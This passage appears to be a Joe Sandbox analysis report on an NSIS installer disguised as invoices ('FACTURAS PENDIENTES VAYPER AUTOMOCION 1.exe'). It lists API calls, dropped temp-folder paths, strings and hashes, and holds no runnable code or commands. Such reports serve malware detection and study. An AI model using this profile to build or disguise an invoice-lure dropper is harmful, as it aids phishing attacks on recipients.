                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                  • String ID: "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\fanin$C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Tolkningen Setup$UXTHEME$\Temp$~nsu
                                  • API String ID: 1152188737-768733493
                                  • Opcode ID: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                  • Instruction ID: 07a9971b8f29bbd68b878d9119023e68a6b74827d1d77f0d98df9434206269f1
                                  • Opcode Fuzzy Hash: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                  • Instruction Fuzzy Hash: 4FD137712043116AD7207F619D46B6B3AACAB4574AF51443FF582B62D2DBBC8E408B2E

                                  APIs
                                  • GetDlgItem.USER32(?,00000403), ref: 00404B6C
                                  • GetDlgItem.USER32(?,000003EE), ref: 00404B7C
                                  • GetClientRect.USER32(00000000,?), ref: 00404BB9
                                  • GetSystemMetrics.USER32(00000002), ref: 00404BC1
                                  • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404BE3
                                  • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404BF2
                                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C00
                                  • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C0A
                                    • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C1C
                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C40
                                  • ShowWindow.USER32(00000000,00000008), ref: 00404C52
                                  • GetDlgItem.USER32(?,000003EC), ref: 00404C74
                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404C88
                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CA3
                                  • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CAD
                                  • ShowWindow.USER32(00000000), ref: 00404D22
                                  • ShowWindow.USER32(00010480,00000008), ref: 00404D27
                                  • GetDlgItem.USER32(?,000003F8), ref: 00404B8C
                                    • Part of subcall function 004054DE: SendMessageW.USER32(00000028,?,?,00405313), ref: 004054EC
                                  • GetDlgItem.USER32(?,000003EC), ref: 00404CCD
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000583F,00000000), ref: 00404CDB
                                  • CloseHandle.KERNELBASE(00000000), ref: 00404CE2
                                  • ShowWindow.USER32(00000008), ref: 00404D5D
                                  • SendMessageW.USER32(00010480,00001004,00000000,00000000), ref: 00404D9C
                                  • CreatePopupMenu.USER32 ref: 00404DB0
                                  • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DCC
                                  • GetWindowRect.USER32(00010480,?), ref: 00404DEA
                                  • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E0C
                                  • SendMessageW.USER32(00010480,00001073,00000000,?), ref: 00404E3B
                                  • OpenClipboard.USER32(00000000), ref: 00404E4B
                                  • EmptyClipboard.USER32 ref: 00404E51
                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E5D
                                  • GlobalLock.KERNEL32(00000000), ref: 00404E6A
                                  • SendMessageW.USER32(00010480,00001073,00000000,?), ref: 00404E86
                                  • GlobalUnlock.KERNEL32(?), ref: 00404EA9
                                  • SetClipboardData.USER32(0000000D,?), ref: 00404EB4
                                  • CloseClipboard.USER32 ref: 00404EBA
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                  • String ID:
                                  • API String ID: 2901622961-0
                                  • Opcode ID: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                  • Instruction ID: 6359324f75213449b6abc0588f6453f91f7fc730003d35bba9c6bb800d03804c
                                  • Opcode Fuzzy Hash: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                  • Instruction Fuzzy Hash: BEA1C5B1205704BBD320AB25DD49F5B7FADFF88750F01493EF681A62A1CB788841CB69

                                  APIs
                                    • Part of subcall function 00406613: lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406667
                                    • Part of subcall function 00406613: GetFileAttributesW.KERNELBASE(00425A48,00425A48), ref: 00406678
                                  • DeleteFileW.KERNELBASE(?,?,00000000,75923420,?), ref: 00406720
                                  • lstrcatW.KERNEL32(00425248,\*.*,00425248,?,00000000,?,00000000,75923420,?), ref: 00406772
                                  • lstrcatW.KERNEL32(?,004082B0,?,00425248,?,00000000,?,00000000,75923420,?), ref: 00406793
                                  • lstrlenW.KERNEL32(?), ref: 00406796
                                  • FindFirstFileW.KERNEL32(00425248,?), ref: 004067AD
                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 0040683E
                                  • FindClose.KERNEL32(00000000), ref: 00406850
                                  Similarity
                                  • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                  • String ID: \*.*
                                  • API String ID: 2636146433-1173974218
                                  • Opcode ID: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                  • Instruction ID: ed3bb2814488eceec14de134e67e78f5f853c3bf88eed2e9a0dc8686b927a400
                                  • Opcode Fuzzy Hash: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                  • Instruction Fuzzy Hash: E841193210671069D7207B399D45A6B76E8DF81318F12453FF883B21D1EB7C8C6686AF
                                  APIs
                                  • CoCreateInstance.OLE32(004089D0,?,00000001,004089B0,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll, xrefs: 004024AC
                                  • C:\Users\user\AppData\Local\Temp\fanin\Leflet, xrefs: 0040241F
                                  Similarity
                                  • API ID: CreateInstance
                                  • String ID: C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 542301482-2943796473
                                  • Opcode ID: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                  • Instruction ID: d428ad0e776067b9467a460b3bd0699ffb91532d5b811a166a6037c041011ccd
                                  • Opcode Fuzzy Hash: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                  • Instruction Fuzzy Hash: CA414A72604341AFC300EFA5C948A2BBBE9FF89314F10092EF695DB291DB79D805CB16
                                  APIs
                                  • FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                  • FindClose.KERNEL32(00000000), ref: 004065C1
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID: HvB
                                  • API String ID: 2295610775-1619000230
                                  • Opcode ID: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                  • Instruction ID: d1368554cb410e246732b21b307163ecdbcfd804cd616700c419d461b784c5b9
                                  • Opcode Fuzzy Hash: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                  • Instruction Fuzzy Hash: 72D0123155A1206FC25057387E0C84B7A999F153717518B36B0A6F11E4C7348C6686AD
                                  APIs
                                  • ShowWindow.USER32(00000000,00000000), ref: 00402061
                                  • EnableWindow.USER32(00000000,00000000), ref: 0040206C
                                  Similarity
                                  • API ID: Window$EnableShow
                                  • String ID:
                                  • API String ID: 1136574915-0
                                  • Opcode ID: 52fef71910991febb17206dff6bdae22265bb691ab5af8558c030a970d53b9a7
                                  • Instruction ID: 5e1a6dc9ac369cb9fdd6eee03f9e71544f162ca31fdf6318b4aac8087fee14a7
                                  • Opcode Fuzzy Hash: 52fef71910991febb17206dff6bdae22265bb691ab5af8558c030a970d53b9a7
                                  • Instruction Fuzzy Hash: 30E026726483009FE354AF20E94E96AB768EB40326F20043FF940A40C1CB7D2C41867E

                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAC
                                  • ShowWindow.USER32(?), ref: 00404FD6
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404FE7
                                  • ShowWindow.USER32(?,00000004), ref: 00405003
                                  • GetDlgItem.USER32(?,00000001), ref: 0040512A
                                  • GetDlgItem.USER32(?,00000002), ref: 00405134
                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040514E
                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519C
                                  • GetDlgItem.USER32(?,00000003), ref: 0040524B
                                  • ShowWindow.USER32(00000000,?), ref: 00405274
                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405288
                                  • KiUserCallbackDispatcher.NTDLL(?), ref: 0040529C
                                  • EnableWindow.USER32(?), ref: 004052B4
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CB
                                  • EnableMenuItem.USER32(00000000), ref: 004052D2
                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E3
                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FA
                                  • lstrlenW.KERNEL32(004211D0,?,004211D0,00000000), ref: 0040532B
                                    • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  • SetWindowTextW.USER32(?,004211D0), ref: 00405343
                                    • Part of subcall function 00401399: MulDiv.KERNEL32(00000011,00007530,00000000), ref: 004013F9
                                    • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                  • DestroyWindow.USER32(?,00000000), ref: 0040538B
                                  • CreateDialogParamW.USER32(?,?,-00429D20), ref: 004053BF
                                    • Part of subcall function 004054F5: SetDlgItemTextW.USER32(?,?,00000000), ref: 0040550F
                                  • GetDlgItem.USER32(?,000003FA), ref: 004053E8
                                  • GetWindowRect.USER32(00000000), ref: 004053EF
                                  • ScreenToClient.USER32(?,?), ref: 004053FB
                                  • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405414
                                  • ShowWindow.USER32(00000008,?,00000000), ref: 00405433
                                    • Part of subcall function 004054C3: SendMessageW.USER32(0001047A,00000000,00000000,00000000), ref: 004054D5
                                  • ShowWindow.USER32(?,0000000A), ref: 00405479
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                  • String ID:
                                  • API String ID: 162979904-0
                                  • Opcode ID: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                  • Instruction ID: 1b19c71cd4f81cfbd26a1cf5418529817e88c436646d4b9e8708edd60e3e664c
                                  • Opcode Fuzzy Hash: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                  • Instruction Fuzzy Hash: C4D1C070601A11AFDB206F21ED48A6B7BA8FB48355F40453EF945B21F0CB399852DFAD

                                  Control-flow Graph
                                  • First basic block: 405a19-405a34 (graph not reproduced)
                                  APIs
                                    • Part of subcall function 004068C1: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                    • Part of subcall function 004068C1: GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                  • lstrcatW.KERNEL32(1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000,75923420,00000000,75923170), ref: 00405A9C
                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\fanin,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000), ref: 00405B20
                                  • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\fanin,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000), ref: 00405B35
                                  • GetFileAttributesW.KERNEL32(Call), ref: 00405B40
                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\fanin), ref: 00405B89
                                    • Part of subcall function 004065FA: wsprintfW.USER32 ref: 00406607
                                  • RegisterClassW.USER32(00428CA0), ref: 00405BCE
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE5
                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1A
                                  • ShowWindow.USER32(00000005,00000000), ref: 00405C4C
                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428CA0), ref: 00405C77
                                  • GetClassInfoW.USER32(00000000,RichEdit,00428CA0), ref: 00405C84
                                  • RegisterClassW.USER32(00428CA0), ref: 00405C91
                                  • DialogBoxParamW.USER32(?,00000000,00404F6D,00000000), ref: 00405CAC
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\fanin$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                  • API String ID: 1975747703-790534633
                                  • Opcode ID: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                  • Instruction ID: 997547c739dba09290e01480a6769471c967da196cfb38af9b733d4135fa1862
                                  • Opcode Fuzzy Hash: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                  • Instruction Fuzzy Hash: 1A610370201601BAE620AB76AD42F2B366CEB04758F51443FF945B62E1DF78AC018B7D

                                  Control-flow Graph
                                  • First basic block: 40154a-4015bd (graph not reproduced)
                                  APIs
                                  • PostQuitMessage.USER32(00000000), ref: 004015F1
                                  • Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
                                  • SetForegroundWindow.USER32 ref: 00401634
                                  • ShowWindow.USER32(00010486,00000000,?,?,00000000,00000000), ref: 004016D3
                                  • ShowWindow.USER32(00010480,?,?,?,00000000,00000000), ref: 004016E8
                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                  • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                  • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll), ref: 004017A3
                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                  • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                  • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                  • CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                  • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
                                  • CloseHandle.KERNELBASE(00000000), ref: 00401A61
                                  • lstrcatW.KERNEL32(Call,00000000,Call,000000E9), ref: 00401A82
                                  Similarity
                                  • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                  • String ID: C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nsnC132.tmp$C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll$Call
                                  • API String ID: 3895412863-1220021032
                                  • Opcode ID: 238787bc3330ffadc63c006c1272a0d69737eff9e1560c5150495ef8301945b7
                                  • Instruction ID: ebeff723cfbe9b45e3b0b0a6f17a4e6c0cbf30734010ce9bbeaf93aeca8f714e
                                  • Opcode Fuzzy Hash: 238787bc3330ffadc63c006c1272a0d69737eff9e1560c5150495ef8301945b7
                                  • Instruction Fuzzy Hash: 93D1F971614301ABC720BF26CD85D2B76A8EF85758F10463FF452B22E1DB7CD8029A6E

                                  Control-flow Graph
                                  • First basic block: 4033c8-403415 (graph not reproduced)
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 004033DB
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,00000400,?,?,?,?,?), ref: 004033F7
                                    • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                    • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 00403441
                                  • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 0040359B
                                  Similarity
                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                  • String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                  • API String ID: 2803837635-970504228
                                  • Opcode ID: af579b943b1a820c08da397bdaa69b1d5dd35135494c3e1d3694e7b1604b832a
                                  • Instruction ID: a22a3d629960f4d7b6f8438a3768dc05bd31f949a9b5a180d7de35419ae1bb07
                                  • Opcode Fuzzy Hash: af579b943b1a820c08da397bdaa69b1d5dd35135494c3e1d3694e7b1604b832a
                                  • Instruction Fuzzy Hash: 2B51EE71640300AFD720AF21DD81B1B7AA8AB88719F10493FF985772E1C7398E458B6E

                                  Control-flow Graph
                                  • First basic block: 405e95-405e9e (graph not reproduced)
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FBF
                                    • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Tolkningen Setup,NSIS Error), ref: 00406B02
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                    • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 00405FD2
                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 004060A5
                                  Similarity
                                  • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 4187626192-1720829553
                                  • Opcode ID: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                  • Instruction ID: 94fe74e46bfd99ff5e6600c27bcf33d7150fb5fb58e2d65541bf0035bd99d3a3
                                  • Opcode Fuzzy Hash: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                  • Instruction Fuzzy Hash: 0F61E5312442159BDB20AB288D40A3B77A4EF58750F11443FF986F72D1DB7CD9219BAE

                                  Control-flow Graph
                                  • First basic block: 405d15-405d21 (graph not reproduced)
                                  APIs
                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                  • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll), ref: 00405D8C
                                  • SendMessageW.USER32(00010480), ref: 00405DB3
                                  • SendMessageW.USER32(00010480,0000104D,00000000,?), ref: 00405DCE
                                  • SendMessageW.USER32(00010480,00001013,00000000,00000000), ref: 00405DDB
                                    • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 1759915248-185127731
                                  • Opcode ID: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                  • Instruction ID: ac3c7827115ee855a696472e6a70c5e4fb7cac6e51cf912ccc90d208c1262af9
                                  • Opcode Fuzzy Hash: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                  • Instruction Fuzzy Hash: 7B21F571A056206BD310AF55AC84A9BBBDCEF94350F44443FF548A3291C7B89D008AAD

                                  Control-flow Graph (rendered graph not reproduced; first node 40291d-402934)
                                  APIs
                                  • ReadFile.KERNELBASE(00000000,?,?,?), ref: 00402994
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: File$ByteCharMultiPointerWide$Read
                                  • String ID: 9
                                  • API String ID: 1439708474-2366072709
                                  • Opcode ID: e380a6304de75cf0a531b116984dfc1ce0981d79b9e21712f5d5f7ee8832471f
                                  • Instruction ID: 06df5d1e4fd17f9c1e4dafe2560c0fdc737aa95be89056b4b35a237a27527231
                                  • Opcode Fuzzy Hash: e380a6304de75cf0a531b116984dfc1ce0981d79b9e21712f5d5f7ee8832471f
                                  • Instruction Fuzzy Hash: 305139B1618341AFD724DF11CA44A2BB7E8BFD5304F00483FF985A62D0DBB9D9458B6A

                                  Control-flow Graph (rendered graph not reproduced; first node 406179-406199)
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                  • wsprintfW.USER32 ref: 004061CC
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%S.dll$UXTHEME$\
                                  • API String ID: 2200240437-1946221925
                                  • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                  • Instruction ID: b03dfa9df8f17b5f94e80c11c2028c51dcc2a5658fc7e28beebe443f54a48520
